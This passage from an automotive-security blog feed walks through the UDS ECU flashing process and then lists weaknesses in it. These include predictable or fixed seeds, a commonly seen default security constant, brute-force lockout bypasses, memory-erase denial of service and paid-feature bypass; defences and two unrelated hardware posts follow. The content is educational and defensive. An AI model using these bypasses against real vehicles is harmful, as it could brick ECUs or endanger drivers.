class="line">8</span><br></pre></td><td class="code"><pre><span class="line">fans@fans:~$ srec_info JKE_X1_APP_SOC.s19 </span><br><span class="line">Format: Motorola S-Record</span><br><span class="line">Header: <span class="string">"JKE_X1_APP_SOC.s19"</span></span><br><span class="line">Execution Start Address: 00FC0000</span><br><span class="line">Data: 01000000 - 01089C5F</span><br><span class="line"> 01180000 - 011800FF</span><br><span class="line"> 0127FB80 - 0127FBDF</span><br><span class="line"> 0127FF80 - 0127FFFF</span><br></pre></td></tr></table></figure><p>File conversion</p><ul><li><p>S-record to Intel HEX</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.s19 -Motorola -o JKE_X1_APP_SOC.hex -Intel</span><br></pre></td></tr></table></figure></li><li><p>Intel HEX to S-record</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.hex -Intel -o JKE_X1_APP_SOC.s19 -Motorola</span><br></pre></td></tr></table></figure></li><li><p>S-record to BIN</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">srec_cat JKE_X1_APP_SOC.s19 -Motorola -o JKE_X1_APP_SOC.bin -bin</span><br></pre></td></tr></table></figure></li></ul><h5 id="HexView"><a href="#HexView" class="headerlink" title="HexView"></a>HexView</h5><p>Conversion between S-record, Intel HEX and BIN can also be done with Vector's graphical file editor HexView.</p><p><img src="image-20230426103115056.png" alt="image-20230426103115056" style="zoom:70%;" /><img src="E:/Team/青骥/知识分享/车联网安全基础知识之27服务.assets/image-20230426103347242.png" alt="image-20230426103347242" style="zoom:70%;" /></p><h5 id="专用工具"><a href="#专用工具" class="headerlink" title="专用工具"></a>Dedicated tools</h5><p>Software written by the OEM or supplier, such as the VBF viewer VBF Tool.</p><p><img src="image-20230426142754998.png" alt="image-20230426142754998"></p><h5 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>Scripts</h5><p>Write a script from the format definition to parse the file and extract the firmware; some can be found on GitHub.</p><figure class="highlight sh"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># wget https://raw.githubusercontent.com/consp/vbfdecode/master/vbfdecode.py</span></span><br><span class="line"><span class="comment"># python vbfdecode.py -b firmware.vbf</span></span><br><span class="line">Offset: 0x359, Location: 0x18000, Size: 0xB256C, Data Offset: 0x361</span><br><span class="line">VBF v2.1</span><br><span class="line">Description: Software part: 1234 <span class="built_in">type</span>: APP</span><br><span class="line">Network: 0x00000000</span><br><span class="line">Data Format Identifier: 0x00000000</span><br><span class="line">ECU address: 0x000007C6</span><br><span class="line">Frame_format:</span><br><span class="line">Erase frames:</span><br><span class="line">Data blobs:</span><br><span class="line">0x00018000 0x000B256C e301</span><br><span class="line"></span><br><span class="line">Saving:</span><br><span class="line"> 18000.bin</span><br></pre></td></tr></table></figure><h2 id="UDS-刷写"><a href="#UDS-刷写" class="headerlink" title="UDS 刷写"></a>UDS flashing</h2><p>When flashing with a tool such as CANoe, the environment does a great deal of work in the background, and we rarely pay attention to what actually happens. Let's look at the whole flow.</p><p><img src="image-20230410232506539.png" alt="image-20230410232506539" style="zoom:75%;" /></p><p>The flashing process has three phases, <strong>pre-flash, flash and post-flash</strong>, and its job is to download the correct flash file (S19 or HEX) into the ECU.</p><h3 id="1-刷写前-设置刷写网络"><a href="#1-刷写前-设置刷写网络" class="headerlink" title="1 刷写前(设置刷写网络 )"></a>1 Pre-flash (set up the flashing network)</h3><p>Before flashing, the tool reads the boot software identification (F180), software version (F188), VIN (F190) and hardware version (F191) from the ECU and uses them to find the matching update file in the flash database. The repair-shop code or tester serial number (F198) and the programming date (F199) are written when the flash starts, so that earlier flash operations can be traced.</p><p>The preparation phase confirms the version information of the controller to be flashed and configures the network. It runs while every controller in the vehicle is still executing its application software; diagnostic requests are sent with the functional address so that all controllers on the network are configured at once.</p><h4 id="1-1-切换到扩展模式-10-03"><a href="#1-1-切换到扩展模式-10-03" class="headerlink" title="1.1 切换到扩展模式(10 03)"></a>1.1 Switch to the extended session (10 03)</h4><p>By default the ECU is in the default session (01); DiagnosticSessionControl 10 03 switches it to the extended session.</p><h4 id="1-2-检查刷写前提条件-31-01-XX-XX"><a href="#1-2-检查刷写前提条件-31-01-XX-XX" class="headerlink" title="1.2 检查刷写前提条件(31 01 XX XX)"></a>1.2 Check the flashing preconditions (31 01 XX XX)</h4><p>OEMs usually define preconditions for flashing a controller, for example vehicle speed below 3 km/h, and this step checks whether they are met. The conditions differ between OEMs and Tier 1s; common ones are:</p><ul><li>ECU supply voltage neither too high nor too low (9 V to 16 V)</li><li>Ignition on, but the vehicle not in the Ready state</li><li>Vehicle stationary, speed 0 km/h</li></ul><p>Concretely, <strong>service 0x31</strong> runs a check-programming-preconditions routine; if a condition is not met (for example the vehicle is moving too fast), the flash is aborted.</p><h4 id="1-3-停用故障码存储功能-85-02"><a href="#1-3-停用故障码存储功能-85-02" class="headerlink" title="1.3 停用故障码存储功能(85 02)"></a>1.3 Disable DTC storage (85 02)</h4><p>During flashing the controller is not operating normally and may be unable to send or receive bus messages, so storing DTCs during this time must be avoided. ControlDTCSetting (0x85) with DTCSettingType off (02) disables DTC storage.</p><h4 id="1-4-停止发送一般通讯报文-28-01-01-XX-XX"><a href="#1-4-停止发送一般通讯报文-28-01-01-XX-XX" class="headerlink" title="1.4 停止发送一般通讯报文(28 01 01 XX XX)"></a>1.4 Stop normal communication messages (28 01 01 XX XX)</h4><p>Flashing moves a lot of data, so disabling the transmission of normal messages lowers the bus load.</p><p>CommunicationControl (0x28) switches off the messages that are unrelated to diagnostics; the bandwidth this frees is used for the flash and speeds it up.</p><h3 id="2-刷写中-认证-amp-下载数据"><a href="#2-刷写中-认证-amp-下载数据" class="headerlink" title="2 刷写中(认证&下载数据)"></a>2 Flash (authentication & data download)</h3><p>The flash phase begins with authentication; the fingerprint can then be written, after which memory is erased, the firmware is downloaded to the specified addresses and the written data is verified.</p><h4 id="2-1-切换到编程会话-10-02"><a href="#2-1-切换到编程会话-10-02" class="headerlink" title="2.1 切换到编程会话(10 02)"></a>2.1 Switch to the programming session (10 02)</h4><p>Flashing is only possible in the <strong>programming session</strong>. DiagnosticSessionControl 10 02 switches to the programming session.</p><h4 id="2-2安全访问-请求种子-27-01"><a href="#2-2安全访问-请求种子-27-01" class="headerlink" title="2.2安全访问-请求种子(27 01)"></a>2.2 SecurityAccess: request the seed (27 01)</h4><p><strong>SecurityAccess (0x27)</strong> ensures that only authorised people or devices can flash. Its <strong>requestSeed</strong> subfunction asks the ECU for the security seed.</p><h4 id="2-3-安全访问-发送与验证Key-27-02"><a href="#2-3-安全访问-发送与验证Key-27-02" class="headerlink" title="2.3 安全访问-发送与验证Key(27 02)"></a>2.3 SecurityAccess: send and verify the key (27 02)</h4><p>Having received the seed, the diagnostic device feeds it to the algorithm both sides know and computes the key, then sends it with the <strong>sendKey</strong> subfunction. The ECU computes the key with the same algorithm, compares it with the value received, and authentication succeeds if they match.</p><p>If authentication fails repeatedly, SecurityAccess is suspended for a while. Each failure increments the ECU's failed-attempt counter; once the counter reaches the limit (3 in a typical configuration), the ECU answers with NRC 0x36 (exceedNumberOfAttempts) and starts a delay timer (typically 10 s). Requests during the delay are answered with NRC 0x37 (requiredTimeDelayNotExpired); only after it expires can a new authentication request be made.</p><h4 id="2-4-写入指纹-2E-XX-XX-YY-YY-…"><a href="#2-4-写入指纹-2E-XX-XX-YY-YY-…" class="headerlink" title="2.4 写入指纹(2E XX XX YY YY …)"></a>2.4 Write the fingerprint (2E XX XX YY YY …)</h4><p>WriteDataByIdentifier records the fingerprint of whoever is writing the software (repair-shop code or tester serial number, F198) and the programming date (F199).</p><h4 id="2-5-擦除内存-31-01-FF-00-AB-XX-XX-YY-YY"><a href="#2-5-擦除内存-31-01-FF-00-AB-XX-XX-YY-YY" class="headerlink" title="2.5 擦除内存(31 01 FF 00 AB XX XX YY YY)"></a>2.5 Erase memory (31 01 FF 00 AB XX XX YY YY)</h4><p>Before data is downloaded into a memory region of the ECU, the existing contents of that region must be erased.</p><p>RoutineControl (0x31) with routine FF00 erases memory, either all at once or in several segments, depending on the controller's memory map and the chip's erase capability.</p><p><em>31 01 FF 00 addressAndLengthFormatIdentifier eraseStartAddress eraseLength</em><br>The start address and length are usually 4 bytes each, in which case AB is 0x44.</p><h4 id="2-6-请求下载-34-XX-YY-ZZ-ZZ-AA-AA"><a href="#2-6-请求下载-34-XX-YY-ZZ-ZZ-AA-AA" class="headerlink" title="2.6 请求下载(34 XX YY ZZ ZZ AA AA)"></a>2.6 RequestDownload (34 XX YY ZZ ZZ AA AA)</h4><p>Before software is transferred to the ECU, the write address and the data size must be specified.</p><p>The flashing device uses RequestDownload (0x34) to tell the ECU the start address and size of the data. The memory region named in a RequestDownload must be contiguous from start to end; if the data is not contiguous, the flashing device sends a separate request for every block to be written.</p><p><em>34 dataFormatIdentifier addressAndLengthFormatIdentifier memoryAddress memorySize</em></p><h4 id="2-7-传输数据-36-XX-YY-YY-…"><a href="#2-7-传输数据-36-XX-YY-YY-…" class="headerlink" title="2.7 传输数据(36 XX YY YY …)"></a>2.7 TransferData (36 XX YY YY …)</h4><p>The software download service: it writes data into the memory specified in the previous step.</p><p>The flashing device uses TransferData (0x36) to move the flash data into the ECU's memory; one block usually needs many TransferData requests.</p><p> <em>36 blockSequenceCounter data</em></p><h4 id="2-8-请求传输退出-37"><a href="#2-8-请求传输退出-37" class="headerlink" title="2.8 请求传输退出 (37)"></a>2.8 RequestTransferExit (37)</h4><p>Service 0x37 ends the flash of the current contiguous memory region; its positive response carries a checksum over the region named in the most recent RequestDownload.</p><p>The returned checksum is compared with the one computed by the flashing device; if they differ, the data is sent again with TransferData, and after repeated verification failures the flash is aborted.</p><h4 id="2-9-检查存储空间-31-01-02-02"><a href="#2-9-检查存储空间-31-01-02-02" class="headerlink" title="2.9 检查存储空间(31 01 02 02)"></a>2.9 Check memory (31 01 02 02)</h4><p>This verifies the reliability of the flashed data: once the software or data has been written, the flashing device runs a routine to verify that every block written to memory succeeded.</p><p>The routine checks the integrity of the written data and confirms its origin, using CRCs, hashes or digital signatures, so that nothing was corrupted during the flash and the data came from a legitimate supplier.</p><h4 id="2-10-检查编程依赖-31-01-FF-01"><a href="#2-10-检查编程依赖-31-01-FF-01" class="headerlink" title="2.10 检查编程依赖(31 01 FF 01)"></a>2.10 Check programming dependencies (31 01 FF 01)</h4><p>RoutineControl (0x31) with routine FF01 confirms that the flashed software matches the ECU hardware and the basic software.</p><h4 id="2-11-ECU复位-11-01"><a href="#2-11-ECU复位-11-01" class="headerlink" title="2.11 ECU复位(11 01)"></a>2.11 ECU reset (11 01)</h4><p>When the whole flash is complete, the flashing device requests a hard reset of the ECU, which then boots into the application.</p><p>ECUReset (0x11) restarts the ECU so that the newly flashed software takes effect.</p><h3 id="3-刷写后-还原网络"><a href="#3-刷写后-还原网络" class="headerlink" title="3 刷写后(还原网络)"></a>3 Post-flash (restore the network)</h3><p>The post-flash steps mirror the pre-flash steps: whatever was disabled before flashing, such as communication, is enabled again.</p><p>The network returns to its normal mode, the ECU communicates normally at the default baud rate, and DTC detection and storage work again. After the flash, every ECU is asked to resume sending and receiving non-diagnostic messages.</p><h4 id="3-1-切换到扩展模式-10-03"><a href="#3-1-切换到扩展模式-10-03" class="headerlink" title="3.1 切换到扩展模式(10 03)"></a>3.1 Switch to the extended session (10 03)</h4><p>By default the ECU is in the default session (01); DiagnosticSessionControl 10 03 switches to the extended session. In the extended session, non-diagnostic communication is enabled, the DTCs produced during the flash are cleared and every ECU resumes DTC detection.</p><h4 id="3-2-启用发送一般通讯报文-28-00-01-XX-XX"><a href="#3-2-启用发送一般通讯报文-28-00-01-XX-XX" class="headerlink" title="3.2 启用发送一般通讯报文(28 00 01 XX XX)"></a>3.2 Re-enable normal communication messages (28 00 01 XX XX)</h4><p>CommunicationControl (0x28) re-enables the normal messages whose transmission and reception were stopped before the flash.</p><h4 id="3-3-各-ECU-恢复故障码的检测-85-01"><a href="#3-3-各-ECU-恢复故障码的检测-85-01" class="headerlink" title="3.3 各 ECU 恢复故障码的检测(85 01)"></a>3.3 Every ECU resumes DTC detection (85 01)</h4><p>ControlDTCSetting (0x85) with DTCSettingType on (01) re-enables DTC storage.</p><h4 id="3-4-ECU-回到默认模式-10-01"><a href="#3-4-ECU-回到默认模式-10-01" class="headerlink" title="3.4 ECU 回到默认模式(10 01)"></a>3.4 Return the ECU to the default session (10 01)</h4><p>Switch from the extended session back to the default session.</p><h3 id="刷写流程图"><a href="#刷写流程图" class="headerlink" title="刷写流程图"></a>Flashing flow diagram</h3><p><img src="image-20230427111842337.png" alt="image-20230427111842337"></p><h2 id="安全威胁"><a href="#安全威胁" class="headerlink" title="安全威胁"></a>Security threats</h2><p>The main threat in flashing is SecurityAccess being defeated; once it is, an attacker can <strong>read the software and data out of the ECU</strong> and <strong>flash tampered firmware</strong>.</p><h3 id="安全访问算法"><a href="#安全访问算法" class="headerlink" title="安全访问算法"></a>The SecurityAccess algorithm</h3><p>SecurityAccess algorithms are generally symmetric and usually just simple shift operations, so their strength is low.</p><ul><li><p><strong>Fault injection:</strong> most algorithms are designed and implemented by the OEM itself and their security is rarely verified; fault injection and similar techniques may bypass the authentication.</p><p><img src="image-20230426164557432.png" alt="image-20230426164557432" style="zoom:50%;" /></p></li><li><p><strong>Leakage:</strong> OEM and supplier source code and internal standards leak onto the internet.</p><p><img src="image-20230426161719829.png" alt="image-20230426161719829" style="zoom:80%;" /></p></li><li><p><strong>Easy to reverse:</strong> seed2key usually ships as a .so file; reversing the library found in the firmware or in the diagnostic tester yields the algorithm.</p><p><img src="image-20230426165344244.png" alt="image-20230426165344244"></p></li></ul><h3 id="Key"><a href="#Key" class="headerlink" title="Key"></a>The key</h3><ul><li><strong>Configuration problems</strong>: the effective key length is too short. In CVE-2017-14937 the airbag control unit's SecurityAccess key is 2 bytes with the first byte always 0x01, so the airbag detonation algorithm has only 256 possible key pairs.</li></ul><h3 id="安全常量"><a href="#安全常量" class="headerlink" title="安全常量"></a>The security constant</h3><p>After the algorithm itself, the most important element is the security constant, usually 4 bytes.</p><ul><li><p><strong>Hardcoded constant</strong>: the constant is hardcoded in the .so library, so reversing the SecurityAccess algorithm reveals it as well.</p><p><img src="image-20230426161424710.png" alt="image-20230426161424710"></p></li><li><p><strong>Default constant:</strong> default constants are used; I have met them repeatedly in penetration tests, and <code>0xc541a9</code> is the most common one.</p></li><li><p><strong>Shared constant</strong>: ECUs that use the same algorithm rely on different constants for their security, so that breaking the algorithm and constant of one module does not directly affect another. In practice, however, all ECUs of the same type in a vehicle model usually share one constant, and per-unit constants are rare.</p></li></ul><h3 id="种子"><a href="#种子" class="headerlink" title="种子"></a>The seed</h3><ul><li><p><strong>Predictable seed:</strong> in one vehicle model the seed is derived from a timer; once the mask is known, subsequent seeds can be predicted, which shortens the attack.</p><figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">static</span> uint32 <span class="title">UDS_GenerateSeed</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line">    uint32 u32LocalSeedValue;</span><br><span class="line"></span><br><span class="line">    u32LocalSeedValue = STM0_TIM0.U;                      <span class="comment">/* free-running timer, not a random source */</span></span><br><span class="line">    u32LocalSeedValue ^= UDS_ku32LocLevel01;              <span class="comment">/* fixed per-level mask */</span></span><br><span class="line">    u32LocalSeedValue = ( u32LocalSeedValue << <span class="number">7</span> ) | ( u32LocalSeedValue >> <span class="number">24</span> );</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> u32LocalSeedValue;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></li><li><p><strong>Weak randomness</strong>: the seed has little entropy and the same seed appears across repeated requests.</p></li><li><p><strong>Fixed seed</strong>: every request returns the same seed, which makes brute-forcing the key feasible.</p></li><li><p><strong>Seed reset</strong>: the seed is the same after every ECU reset; resetting after each attempt cuts the search space by orders of magnitude.</p></li></ul><h3 id="安全防护-Bypass"><a href="#安全防护-Bypass" class="headerlink" title="安全防护 Bypass"></a>Bypassing the protection</h3><ul><li>Bypass at the application layer: on vehicle models with remote diagnostics, sensitive functions can be driven through the application layer without ever touching SecurityAccess.</li><li>ECU Reset clears the SecurityAccess lockout delay.</li><li>Lockout bypass: the 2010 VW Golf steering ECU, which implemented UDS over K-line, cleared the failed-attempt counter after a login at a low privilege level; interleaving low-privilege logins while brute-forcing the high privilege level allowed continuous brute force.</li></ul><hr><h3 id="拒绝服务"><a href="#拒绝服务" class="headerlink" title="拒绝服务"></a>Denial of service</h3><ul><li>Continuously sending wrong keys triggers the 10 s lockout and blocks legitimate flashing.</li><li>The 0x31 erase-memory routine bricks the ECU.</li><li>Incomplete preconditions: running the flash flow while the vehicle is in motion endangers driving; stopping normal message transmission while driving causes abnormal behaviour.</li></ul><h3 id="窃听获取固件"><a href="#窃听获取固件" class="headerlink" title="窃听获取固件"></a>Recovering firmware by eavesdropping</h3><p>Because CAN is a broadcast bus, every node receives every message. If the firmware is not encrypted in transit (the dataFormatIdentifier in RequestDownload says "no encryption"), anyone who keeps listening on the bus can capture the firmware while an ECU update is performed.</p><h3 id="非法刷写"><a href="#非法刷写" class="headerlink" title="非法刷写"></a>Unauthorised flashing</h3><ul><li>0x34 and 0x36 are not protected by authentication, so flashing works without authenticating.</li><li>The authentication is broken and illegitimate firmware is flashed.</li></ul><h3 id="软件付费绕过"><a href="#软件付费绕过" class="headerlink" title="软件付费绕过"></a>Bypassing paid features</h3><p>After authenticating, tamper with the firmware or send forged messages to enable features that require an extra payment.</p><h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>Defences</h2><ul><li><p><strong>Use asymmetric cryptography</strong>: replace <strong>service 0x27</strong> with <strong>service 0x29</strong>, which supports asymmetric algorithms and raises security considerably; even if the algorithm leaks, there is no impact, because the private key rather than the algorithm is the secret.</p></li><li><p><strong>Keep the security constant in secure storage:</strong> the constants of home-grown symmetric algorithms are usually hardcoded in a .so library and easily reversed out. They should be held in secure storage.</p></li><li><p><strong>Sound algorithm logic:</strong> avoid designs such as producing the same seed after every ECU reset, and put every sensitive function behind SecurityAccess.</p></li><li><p><strong>Secure configuration</strong>: an adequate effective key length defends against brute force; complete preconditions ensure the flash flow only runs under the intended conditions.</p></li><li><p><strong>Secure boot</strong>: with secure boot, tampered firmware flashed after a SecurityAccess break is refused at start-up.</p></li><li><p><strong>Secure transport:</strong> transfer the firmware encrypted, with the dataFormatIdentifier in RequestDownload declaring encryption and a correspondingly encrypted image.</p></li><li><p><strong>Monitoring:</strong> detect potential attacks and block them in time.</p></li><li><p><strong>Recovery:</strong> when tampering is detected, restore from backups, the cloud or similar sources.</p></li></ul><h2 id="附录"><a href="#附录" class="headerlink" title="附录"></a>Appendix</h2><h3 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h3><ul><li><p>ISO 14229 Unified diagnostic services (UDS) — Part 1</p></li><li><p>XXXX ECU reprogramming specification</p></li><li><p><a href="https://delikely.github.io/Automotive-Security-Timeline/">Automotive security incident timeline</a></p></li><li><p><a href="https://delikely.github.io/2099/01/01/automotive-security/">Automotive security</a></p></li><li><p><a href="https://blog.csdn.net/qq_34309267/article/details/108372077?utm_source=app&app_version=4.15.1">Bootloader development (UDS-based)</a></p></li><li><p><a href="https://mp.weixin.qq.com/s/4GKgaRp_FElSpUdUeEx2yQ">UDS-based ECU software flashing flow</a></p></li><li><p><a href="https://zhuanlan.zhihu.com/p/446348996">UDS diagnostic services basics: 0x27</a></p></li><li><p><a href="https://blog.csdn.net/qq_34414530/article/details/129406839">Flashing with CAPL in CANoe, step by step (with Trace screenshots)</a></p></li><li><p><a href="https://blog.csdn.net/CynalFly/article/details/122089747">[VCU] The S19 file (S-record) explained</a></p></li><li><p><a href="https://en.wikipedia.org/wiki/SREC_(file_format)">SREC (file format) - Wikipedia</a></p></li><li><p><a href="https://blog.hoxbot.com/มาตรฐาน-intel-hex-file-format/">Intel HEX file format</a></p></li><li><p><a href="https://en.wikipedia.org/wiki/Intel_HEX">Intel HEX - Wikipedia</a></p></li><li><p><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Milburn-There-Will-Be-Glitches-Extracting-And-Analyzing-Automotive-Firmware-Efficiently.pdf">us-18-Milburn-There-Will-Be-Glitches-Extracting-And-Analyzing-Automotive-Firmware-Efficiently</a></p></li></ul>]]></content>
<summary type="html"><h1 id="车联网安全基础知识之UDS刷写"><a href="#车联网安全基础知识之UDS刷写" class="headerlink" title="车联网安全基础知识之UDS刷写"></a>Automotive Security Basics: UDS Flashing</h1><p>It has been a while since the last post. The <</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Automotive Security Basics: Making a USB SPH2.0 Harness</title>
<link href="http://delikely.github.io/2022/10/19/DIY-USB-SPH2-0/"/>
<id>http://delikely.github.io/2022/10/19/DIY-USB-SPH2-0/</id>
<published>2022-10-19T06:12:34.000Z</published>
<updated>2022-11-09T09:17:31.809Z</updated>
<content type="html"><![CDATA[<h2 id="车联网安全基础知识之USB-SPH2-0线束制作"><a href="#车联网安全基础知识之USB-SPH2-0线束制作" class="headerlink" title="车联网安全基础知识之USB SPH2.0线束制作"></a>Automotive Security Basics: Making a USB SPH2.0 Harness</h2><p>Head units and TBOXes use several kinds of USB connector, and the pin order can differ between vehicle models. Anyone who works on cars owns a USB Type-A male-to-male cable. When testing a single module, though, a Type-A male-to-male cable is not enough: the USB port on the device is a pin-header style plug, so we need some less common adapters from that header to Type-A. Common USB connectors on TBOXes and head units include SPH2.0 and HSD. These odd connectors are hard to buy ready-made on Taobao in the form we need (the pin order is non-standard), so we make the harness ourselves.</p><p>Today I'll share how to make a USB SPH2.0 connector; HSD will follow in a later post.</p><p><img src="image-20221018093807275.png" alt="image-20221018093807275" style="zoom: 67%;" /><img src="image-20221018094629425.png" alt="image-20221018094629425" style="zoom: 113%;" /><img src="image-20221018142545857.png" alt="image-20221018142545857" style="zoom:130%;" /></p><p>Although all of these have 4 pins, their keying differs, so a small housing is needed to match each keying. The next step is to find such a housing.</p><h3 id="购买材料"><a href="#购买材料" class="headerlink" title="购买材料"></a>Buying the parts</h3><p>I could see that the port was a rectangular USB header but did not know its name. After a long search on Taobao it turned out to be called SPH2.0, where 2.0 is the pin pitch of 2.0 mm. Once you know the name, things get easy: buy some harness materials and make the cable to order. The materials and tools needed:</p><ul><li><p><strong>4-wire USB male open-ended cable</strong>: since the goal is to connect to a PC, we want a USB Type-A open-ended cable with a male plug. A Type-A female open-ended cable also works, but then a Type-A male-to-male cable is needed between it and the PC.</p><p><img src="image-20221018100836355.png" alt="image-20221018100836355"></p></li><li><p><strong>SPH2.0 2x2 dual-row housing with latch</strong>: the USB connector needs 4 pins (2x2). Whether it has a latch does not matter; most of the ones sold do, and it does not affect use; if it does not fit, cut it off with a blade.</p><p><img src="image-20221018101106499.png" alt="image-20221018101106499" style="zoom:40%;" /></p></li><li><p><strong>SPH2.0 crimp terminals</strong>: buy a few extra, they are cheap; when starting out, practise on a few with Dupont wire.</p><p><img src="image-20221018095832468.png" alt="image-20221018095832468"></p></li></ul><ul><li><p><strong>Crimping pliers</strong>, to attach the SPH2.0 terminals to the wires of the USB cable.</p><p><img src="image-20221018100617596.png" alt="image-20221018100617596"></p></li><li><p><strong>Multimeter</strong>, to work out the pin order and to verify that the finished adapter cable is connected correctly.</p></li></ul><h3 id="分析针脚定义"><a href="#分析针脚定义" class="headerlink" title="分析针脚定义"></a>Working out the pinout</h3><p>Pin assignments vary by manufacturer, so we have to analyse them ourselves. GND is the easiest to find: use the multimeter's continuity test between each of the four pins and the metal USB shell; the pin that beeps is GND. The pin diagonally opposite it is VCC (a rule of thumb from my own experience). The remaining two are D+ and D-; they can be identified from the pins of the chip they connect to on the board, but many chips are BGA packages that are hard to probe. There is also a quick and crude method: wire D+ and D- either way round and see whether the PC reacts and enumerates a USB device; if not, swap the two wires. Below is the pinout of the harness I needed this time. Inserting a terminal in the wrong position is no problem: gently lift the latch with tweezers or a flat screwdriver, pull the wrong SPH2.0 terminal out of the 2x2 housing and reinsert it in the right position.</p><p><img src="image-20221018001231089.png" alt="image-20221018001231089"></p><h3 id="制作"><a href="#制作" class="headerlink" title="制作"></a>Assembly</h3><ol><li>Take an SPH2.0 terminal.</li><li>Hold the crimping pliers with the concave side down. Hold the terminal in your left hand with its open side facing the concave side of the crimp slot, flush with the right edge of the slot.</li><li>Squeeze gently until the terminal deforms slightly.</li><li>Insert a wire of the open-ended USB cable from the right; because the two sides of the pliers differ in height, the insulation stops exactly against the left side.</li><li>Keep squeezing; once the crimp is complete the pliers spring open by themselves and the terminal can be taken out.</li><li>Repeat steps 1 to 5 to attach the remaining three terminals to the USB cable's wires.</li><li>Insert the terminals into the SPH2.0 2x2 housing according to the pinout. Note that the bump on the terminal must face outward so that it catches on the outer side of the housing.</li><li>Finally, push each terminal home with a male Dupont pin so that it is seated properly in the housing.</li></ol><p>Before making the harness I searched online for a tutorial video and found none, so I recorded one myself. It is my first video and still rough; message me if you have questions.</p><iframe src="//player.bilibili.com/player.html?aid=986715861&bvid=BV1mt4y1M7qh&cid=865302871&page=1" scrolling="no" border="0" frameborder="no" framespacing="0" allowfullscreen="true"> </iframe>]]></content>
<summary type="html"><h2 id="车联网安全基础知识之USB-SPH2-0线束制作"><a href="#车联网安全基础知识之USB-SPH2-0线束制作" class="headerlink" title="车联网安全基础知识之USB SPH2.0线束制作"></a>Automotive Security Basics: Making a USB </summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Automotive Security Basics: Buying a Test Bench</title>
<link href="http://delikely.github.io/2022/05/19/trail-of-chentian/"/>
<id>http://delikely.github.io/2022/05/19/trail-of-chentian/</id>
<published>2022-05-19T07:54:03.000Z</published>
<updated>2022-05-19T14:12:20.000Z</updated>
<content type="html"><![CDATA[<p>I have recently been on a business trip to Guangzhou and took a walk around the Guangzhou Huadu (Kaitong) auto-parts market. For earlier research I had to put together a few test benches, and building a bench is a real headache, especially when it also has to carry vulnerabilities. Today I want to talk about a few things I have learned about buying test parts.</p><h3 id="汽车界”华强北”一日游"><a href="#汽车界”华强北”一日游" class="headerlink" title="A Day Trip to the Car World’s “Huaqiangbei”"></a>A Day Trip to the Car World’s “Huaqiangbei”</h3><p>First of all, why a day trip to the <code>Guangzhou Huadu (Kaitong) auto-parts market</code>, and what is so special about it? It is the largest auto-parts market in China, with about 1,500 stalls in total. The predecessor of the <code>Huadu auto-parts market</code> was the very well-known <code>Chentian auto-parts market</code> (nicknamed the <code>Huaqiangbei</code> of the car world); after Chentian was demolished, more than 80% of its merchants moved to Huadu. Although Chentian closed in 2019 because of the redevelopment of Chentian village, plenty of legends about it are still going around.</p><blockquote><p>Walk into Chentian with a steering wheel and you can drive out with a Ferrari.</p></blockquote><blockquote><p>The story goes that the well-known German car magazine AutoBild had a BMW 320d GT as a long-term test car. Its center display, center console assembly and navigation head unit were stolen in Hamburg. The Germans, however, had fitted the head unit with a GPS tracker, so after the theft they could follow its position in real time. Where did the anti-theft GPS end up? Chentian, of course. In 71 days the center display made a remarkable 18,000 km journey.</p></blockquote><p>It was these legends that drew my attention to Chentian. As it happened, I also had some purchasing needs recently and was on a business trip to Guangzhou, so on Saturday I asked a local friend to come and have a look with me.</p><p>The Huadu auto-parts market is in Guangzhou's Huadu district, a little over ten kilometers north of Baiyun airport.</p><p><img src="640.jpeg" alt="img"></p><p>The map still shows a stall labelled <code>Guangzhou Chentian salvaged-parts stall</code> inside the market, so I headed straight for it as soon as I got out of the car, only to find it under renovation. We still went up and asked whether they had any connected-vehicle parts for sale; the answer was no, so we left disappointed and went searching stall by stall. After more than two hours we had finally covered the whole market. Two things stood out. First, the market <strong>mainly deals in parts for foreign luxury brands, with very few parts for domestic cars</strong>. Second, it is still <strong>dominated by traditional parts; connected-vehicle parts from new-energy vehicles are scarce</strong>. From a security-research point of view the trip was rather disappointing: I had expected to fill a sack, but in the end I carefully picked out just two parts. The likely reasons are that connected vehicles are still fairly new, there are few salvaged parts, and no market of any size has formed yet; also, for the tuning scene, connected parts are not the focus, among other factors. As the share of intelligent connected vehicles keeps growing, I expect the share of connected parts to grow with it.</p><p>Connected parts may be scarce, but this is a dream destination for engine tuning and immobilizer matching, and still worth exploring. Take a look at their workspace: does it not look a lot like the lab benches of the experts among you? Messy, but practical.</p><p><img src="image-20220516000501506.png" alt="image-20220516000501506"></p><h3 id="测试台架购买"><a href="#测试台架购买" class="headerlink" title="Buying a Test Bench"></a>Buying a Test Bench</h3><p>Everyone doing research needs a test bench. Buying one means weighing both its functionality and its cost, and it is a job that eats time and people.</p><p>The title says buying a test bench, but being able to buy a ready-made bench is the ideal case. In reality you buy individual parts and then sort out the wiring yourself or find someone to do it. For connected-vehicle security research you sometimes need a whole-vehicle bench, sometimes a bench for a single part, and 